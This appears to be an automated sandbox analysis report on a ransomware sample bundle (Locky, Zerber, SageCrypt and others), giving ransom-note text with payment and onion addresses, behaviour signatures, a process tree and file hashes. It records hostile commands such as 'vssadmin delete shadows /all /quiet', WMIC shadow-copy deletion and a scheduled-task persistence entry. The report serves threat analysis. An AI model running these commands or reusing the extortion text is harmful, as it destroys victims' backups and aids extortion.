>컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+gjhcp.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/5D8781B599CFEA91 2. http://b4youfred5485jgsa3453f.italazudda.com/5D8781B599CFEA91 3. http://5rport45vcdef345adfkksawe.bematvocal.at/5D8781B599CFEA91 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/5D8781B599CFEA91 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/5D8781B599CFEA91 http://b4youfred5485jgsa3453f.italazudda.com/5D8781B599CFEA91 http://5rport45vcdef345adfkksawe.bematvocal.at/5D8781B599CFEA91 *-*-* Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/5D8781B599CFEA91 *-*-* Your personal identification ID: 5D8781B599CFEA91
URLs

http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/5D8781B599CFEA91

http://b4youfred5485jgsa3453f.italazudda.com/5D8781B599CFEA91

http://5rport45vcdef345adfkksawe.bematvocal.at/5D8781B599CFEA91

http://fwgrhsao3aoml7ej.onion/5D8781B599CFEA91

http://fwgrhsao3aoml7ej.ONION/5D8781B599CFEA91

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Gozi family
  • Contacts a large (8312) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 5 IoCs
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Interacts with shadow copies 3 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00287.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2416
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Users\Admin\Desktop\00287\HEUR-Trojan-Ransom.Win32.Agent.gen-d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a.exe
      HEUR-Trojan-Ransom.Win32.Agent.gen-d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1292
      • C:\Users\Admin\Desktop\00287\HEUR-Trojan-Ransom.Win32.Agent.gen-d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a.exe
        HEUR-Trojan-Ransom.Win32.Agent.gen-d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a.exe
        3⤵
          PID:2552
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\_README_N8SJB_.hta"
            4⤵
              PID:1612
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
                PID:2868
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im "HEUR-Trojan-Ransom.Win32.Agent.gen-d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a.exe"
                  5⤵
                  • Kills process with taskkill
                  PID:2796
                • C:\Windows\system32\PING.EXE
                  ping -n 1 127.0.0.1
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:3008
          • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Agent.iyi-96e0f2a803195e87752de63e91566dfe74b565d80e3c36efd90d85ec1b3be632.exe
            Trojan-Ransom.Win32.Agent.iyi-96e0f2a803195e87752de63e91566dfe74b565d80e3c36efd90d85ec1b3be632.exe
            2⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:1480
            • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Agent.iyi-96e0f2a803195e87752de63e91566dfe74b565d80e3c36efd90d85ec1b3be632.exe
              Trojan-Ransom.Win32.Agent.iyi-96e0f2a803195e87752de63e91566dfe74b565d80e3c36efd90d85ec1b3be632.exe
              3⤵
                PID:764
                • C:\Windows\SysWOW64\explorer.exe
                  "C:\Windows\system32\explorer.exe"
                  4⤵
                    PID:1804
              • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Bitman.jqn-a43d6f88a8a24c7ed5771344784001d79be32bac0b8f7b0e0640b1b44a5ec799.exe
                Trojan-Ransom.Win32.Bitman.jqn-a43d6f88a8a24c7ed5771344784001d79be32bac0b8f7b0e0640b1b44a5ec799.exe
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                PID:2888
                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Bitman.jqn-a43d6f88a8a24c7ed5771344784001d79be32bac0b8f7b0e0640b1b44a5ec799.exe
                  Trojan-Ransom.Win32.Bitman.jqn-a43d6f88a8a24c7ed5771344784001d79be32bac0b8f7b0e0640b1b44a5ec799.exe
                  3⤵
                    PID:2848
                    • C:\Windows\pnjpqbywgwdf.exe
                      C:\Windows\pnjpqbywgwdf.exe
                      4⤵
                        PID:3068
                        • C:\Windows\pnjpqbywgwdf.exe
                          C:\Windows\pnjpqbywgwdf.exe
                          5⤵
                            PID:1824
                            • C:\Windows\System32\wbem\WMIC.exe
                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                              6⤵
                                PID:2544
                              • C:\Windows\SysWOW64\NOTEPAD.EXE
                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                6⤵
                                • Opens file in notepad (likely ransom note)
                                PID:828
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
                                6⤵
                                  PID:896
                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:896 CREDAT:275457 /prefetch:2
                                    7⤵
                                      PID:3004
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\PNJPQB~1.EXE
                                    6⤵
                                      PID:908
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00287\TROJAN~2.EXE
                                  4⤵
                                    PID:2332
                              • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Blocker.jzey-7cf5cc09f9a8d5cc5cd1aa0ab400af4a08879adfcd09101c7ec89a1ce5904981.exe
                                Trojan-Ransom.Win32.Blocker.jzey-7cf5cc09f9a8d5cc5cd1aa0ab400af4a08879adfcd09101c7ec89a1ce5904981.exe
                                2⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:3020
                                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Blocker.jzey-7cf5cc09f9a8d5cc5cd1aa0ab400af4a08879adfcd09101c7ec89a1ce5904981.exe
                                  Trojan-Ransom.Win32.Blocker.jzey-7cf5cc09f9a8d5cc5cd1aa0ab400af4a08879adfcd09101c7ec89a1ce5904981.exe
                                  3⤵
                                    PID:1056
                                    • C:\Windows\syswow64\explorer.exe
                                      "C:\Windows\syswow64\explorer.exe"
                                      4⤵
                                        PID:1992
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                          5⤵
                                            PID:1112
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            5⤵
                                              PID:1136
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              5⤵
                                                PID:2284
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                5⤵
                                                  PID:1396
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                  5⤵
                                                    PID:584
                                            • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Foreign.njwr-d73edb11c1597d9dc64545f079c230911e5505489e68aa1575153430b273a18d.exe
                                              Trojan-Ransom.Win32.Foreign.njwr-d73edb11c1597d9dc64545f079c230911e5505489e68aa1575153430b273a18d.exe
                                              2⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2892
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\E792\73C9.bat" "C:\Users\Admin\AppData\Roaming\MICROS~1\DDAC3dlg\bitspntw.exe" "C:\Users\Admin\Desktop\00287\TROJAN~4.EXE""
                                                3⤵
                                                  PID:2992
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C ""C:\Users\Admin\AppData\Roaming\MICROS~1\DDAC3dlg\bitspntw.exe" "C:\Users\Admin\Desktop\00287\TROJAN~4.EXE""
                                                    4⤵
                                                      PID:2940
                                                      • C:\Users\Admin\AppData\Roaming\MICROS~1\DDAC3dlg\bitspntw.exe
                                                        "C:\Users\Admin\AppData\Roaming\MICROS~1\DDAC3dlg\bitspntw.exe" "C:\Users\Admin\Desktop\00287\TROJAN~4.EXE"
                                                        5⤵
                                                          PID:3068
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe
                                                            6⤵
                                                              PID:2248
                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Gen.hly-f241f35bb0f53a1baf0e5da26ef7bb86f3de83e94f3ccab04086b26f2f95dde5.exe
                                                      Trojan-Ransom.Win32.Gen.hly-f241f35bb0f53a1baf0e5da26ef7bb86f3de83e94f3ccab04086b26f2f95dde5.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      PID:1996
                                                      • C:\Users\Admin\AppData\Roaming\cl\cl.exe
                                                        C:\Users\Admin\AppData\Roaming\cl\cl.exe
                                                        3⤵
                                                          PID:2852
                                                          • \??\c:\windows\SysWOW64\vssadmin.exe
                                                            c:\windows\system32\vssadmin.exe delete shadows /all /quiet
                                                            4⤵
                                                            • Interacts with shadow copies
                                                            PID:564
                                                      • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.bil-a1a050e249bcd548d2cf548244dfec407c00de568529c7e2a1ba78ebddd24515.exe
                                                        Trojan-Ransom.Win32.Locky.bil-a1a050e249bcd548d2cf548244dfec407c00de568529c7e2a1ba78ebddd24515.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:1992
                                                      • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.eq-7bcd80f4ba829652fcd4514585d00052ce8c8bdb48b3f7b651846de264bcba32.exe
                                                        Trojan-Ransom.Win32.Locky.eq-7bcd80f4ba829652fcd4514585d00052ce8c8bdb48b3f7b651846de264bcba32.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:1948
                                                      • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.xnr-2fd6e890d882a29f4cfadc123f8016e584a864aba3c1166dfc0fea4f37a66fd8.exe
                                                        Trojan-Ransom.Win32.Locky.xnr-2fd6e890d882a29f4cfadc123f8016e584a864aba3c1166dfc0fea4f37a66fd8.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:2668
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysA61F.tmp"
                                                          3⤵
                                                            PID:640
                                                        • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.xpk-4c663be2abf9417d8160f68982f0d8b9907afdcc51838e72185a8f7738f99e51.exe
                                                          Trojan-Ransom.Win32.Locky.xpk-4c663be2abf9417d8160f68982f0d8b9907afdcc51838e72185a8f7738f99e51.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Enumerates connected drives
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:2900
                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\DesktopOSIRIS.htm
                                                            3⤵
                                                              PID:528
                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:528 CREDAT:275457 /prefetch:2
                                                                4⤵
                                                                  PID:1280
                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:528 CREDAT:275461 /prefetch:2
                                                                  4⤵
                                                                    PID:1512
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys9C6E.tmp"
                                                                  3⤵
                                                                    PID:2248
                                                                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.yz-ca1d9a2a7aff6461cabb5579159e438efe56b672c41cba1c19e6a8a13ff26e22.exe
                                                                  Trojan-Ransom.Win32.Locky.yz-ca1d9a2a7aff6461cabb5579159e438efe56b672c41cba1c19e6a8a13ff26e22.exe
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:2952
                                                                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.zi-ed7f1ade710f30310204288d0d60cf41ff66eeb21f68dd985fedb3b5eb8048fc.exe
                                                                  Trojan-Ransom.Win32.Locky.zi-ed7f1ade710f30310204288d0d60cf41ff66eeb21f68dd985fedb3b5eb8048fc.exe
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:1744
                                                                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.SageCrypt.cxs-2986976f43ebeae04db023cc17d8c770c7891f2d9a49d17b2c206c1ac5374063.exe
                                                                  Trojan-Ransom.Win32.SageCrypt.cxs-2986976f43ebeae04db023cc17d8c770c7891f2d9a49d17b2c206c1ac5374063.exe
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:2884
                                                                  • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.SageCrypt.cxs-2986976f43ebeae04db023cc17d8c770c7891f2d9a49d17b2c206c1ac5374063.exe
                                                                    "C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.SageCrypt.cxs-2986976f43ebeae04db023cc17d8c770c7891f2d9a49d17b2c206c1ac5374063.exe" g
                                                                    3⤵
                                                                      PID:916
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                                                                      3⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:2516
                                                                    • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                                                      3⤵
                                                                        PID:1576
                                                                        • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                          4⤵
                                                                            PID:1636
                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                            "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                            4⤵
                                                                            • Interacts with shadow copies
                                                                            PID:1480
                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                            "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                            4⤵
                                                                            • Interacts with shadow copies
                                                                            PID:1748
                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                            "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                            4⤵
                                                                            • Interacts with shadow copies
                                                                            PID:1356
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                            4⤵
                                                                              PID:996
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                              4⤵
                                                                                PID:2888
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
                                                                              3⤵
                                                                                PID:2332
                                                                            • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.dpqs-7fd9aab2ff1a73a7c2eba96c12b9e266f0e5ad4c84057dcaf887c73b1b3df6f6.exe
                                                                              Trojan-Ransom.Win32.Zerber.dpqs-7fd9aab2ff1a73a7c2eba96c12b9e266f0e5ad4c84057dcaf887c73b1b3df6f6.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:1112
                                                                              • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.dpqs-7fd9aab2ff1a73a7c2eba96c12b9e266f0e5ad4c84057dcaf887c73b1b3df6f6.exe
                                                                                Trojan-Ransom.Win32.Zerber.dpqs-7fd9aab2ff1a73a7c2eba96c12b9e266f0e5ad4c84057dcaf887c73b1b3df6f6.exe
                                                                                3⤵
                                                                                  PID:2920
                                                                              • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.dstt-325ae5820e59f2ca5d1b5efd8c03ee3a39327aa15ca846847edc8b00dd50803d.exe
                                                                                Trojan-Ransom.Win32.Zerber.dstt-325ae5820e59f2ca5d1b5efd8c03ee3a39327aa15ca846847edc8b00dd50803d.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:1816
                                                                                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.dstt-325ae5820e59f2ca5d1b5efd8c03ee3a39327aa15ca846847edc8b00dd50803d.exe
                                                                                  Trojan-Ransom.Win32.Zerber.dstt-325ae5820e59f2ca5d1b5efd8c03ee3a39327aa15ca846847edc8b00dd50803d.exe
                                                                                  3⤵
                                                                                    PID:1968
                                                                                • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.tvl-a52b3e931777b7f749e7663007adc9bf1d6dc0064a0ffd2cf072a8adb53fd148.exe
                                                                                  Trojan-Ransom.Win32.Zerber.tvl-a52b3e931777b7f749e7663007adc9bf1d6dc0064a0ffd2cf072a8adb53fd148.exe
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:1160
                                                                                  • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.tvl-a52b3e931777b7f749e7663007adc9bf1d6dc0064a0ffd2cf072a8adb53fd148.exe
                                                                                    Trojan-Ransom.Win32.Zerber.tvl-a52b3e931777b7f749e7663007adc9bf1d6dc0064a0ffd2cf072a8adb53fd148.exe
                                                                                    3⤵
                                                                                      PID:2640
                                                                                  • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.vcp-e66c9959bcc4ab913b89e9dabe392b785616f1b5f2039a5757f0dc5d30e76690.exe
                                                                                    Trojan-Ransom.Win32.Zerber.vcp-e66c9959bcc4ab913b89e9dabe392b785616f1b5f2039a5757f0dc5d30e76690.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:1592
                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.vcp-e66c9959bcc4ab913b89e9dabe392b785616f1b5f2039a5757f0dc5d30e76690.exe
                                                                                      Trojan-Ransom.Win32.Zerber.vcp-e66c9959bcc4ab913b89e9dabe392b785616f1b5f2039a5757f0dc5d30e76690.exe
                                                                                      3⤵
                                                                                        PID:1080
                                                                                    • C:\Users\Admin\Desktop\00287\UDS-Trojan-Ransom.Win32.Zerber.a-470d82dec3c67b3d319ac7774f4276de82a5c853c8c39bb626df0fe81d6a1859.exe
                                                                                      UDS-Trojan-Ransom.Win32.Zerber.a-470d82dec3c67b3d319ac7774f4276de82a5c853c8c39bb626df0fe81d6a1859.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                      PID:1644
                                                                                      • C:\Users\Admin\Desktop\00287\UDS-Trojan-Ransom.Win32.Zerber.a-470d82dec3c67b3d319ac7774f4276de82a5c853c8c39bb626df0fe81d6a1859.exe
                                                                                        UDS-Trojan-Ransom.Win32.Zerber.a-470d82dec3c67b3d319ac7774f4276de82a5c853c8c39bb626df0fe81d6a1859.exe
                                                                                        3⤵
                                                                                          PID:2748
                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                      1⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:2512
                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                      C:\Windows\system32\vssvc.exe
                                                                                      1⤵
                                                                                        PID:1200
                                                                                      • C:\Windows\SysWOW64\DllHost.exe
                                                                                        C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                        1⤵
                                                                                          PID:2184
                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                          C:\Windows\system32\AUDIODG.EXE 0x584
                                                                                          1⤵
                                                                                            PID:472
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\4B74.bi1"
                                                                                            1⤵
                                                                                              PID:2940
                                                                                              • C:\Windows\system32\nslookup.exe
                                                                                                nslookup myip.opendns.com resolver1.opendns.com
                                                                                                2⤵
                                                                                                  PID:2772
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4B74.bi1"
                                                                                                1⤵
                                                                                                  PID:2932
                                                                                                • C:\Windows\SysWOW64\DllHost.exe
                                                                                                  C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                  1⤵
                                                                                                    PID:2792
                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                    1⤵
                                                                                                      PID:2604

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+gjhcp.html

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                      MD5

                                                                                                      6931ff392df95a9b69ffa216255f64fe

                                                                                                      SHA1

                                                                                                      642c47b9dbe91c462541aa2d80dc9c7cf32273d8

                                                                                                      SHA256

                                                                                                      d12093484dc269ed64e4c9959c8029c0d4e430aaa8ea2b0a40b17bc8179df5e1

                                                                                                      SHA512

                                                                                                      ef8d8a1c040c0203de65859d7691236196cd108890b0acd76e46f3e53a42ebb280035e6e34addbc50514157583e57e6cfff1c394bdb9371cbbde38e7028ded32

                                                                                                    • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+gjhcp.png

                                                                                                      Filesize

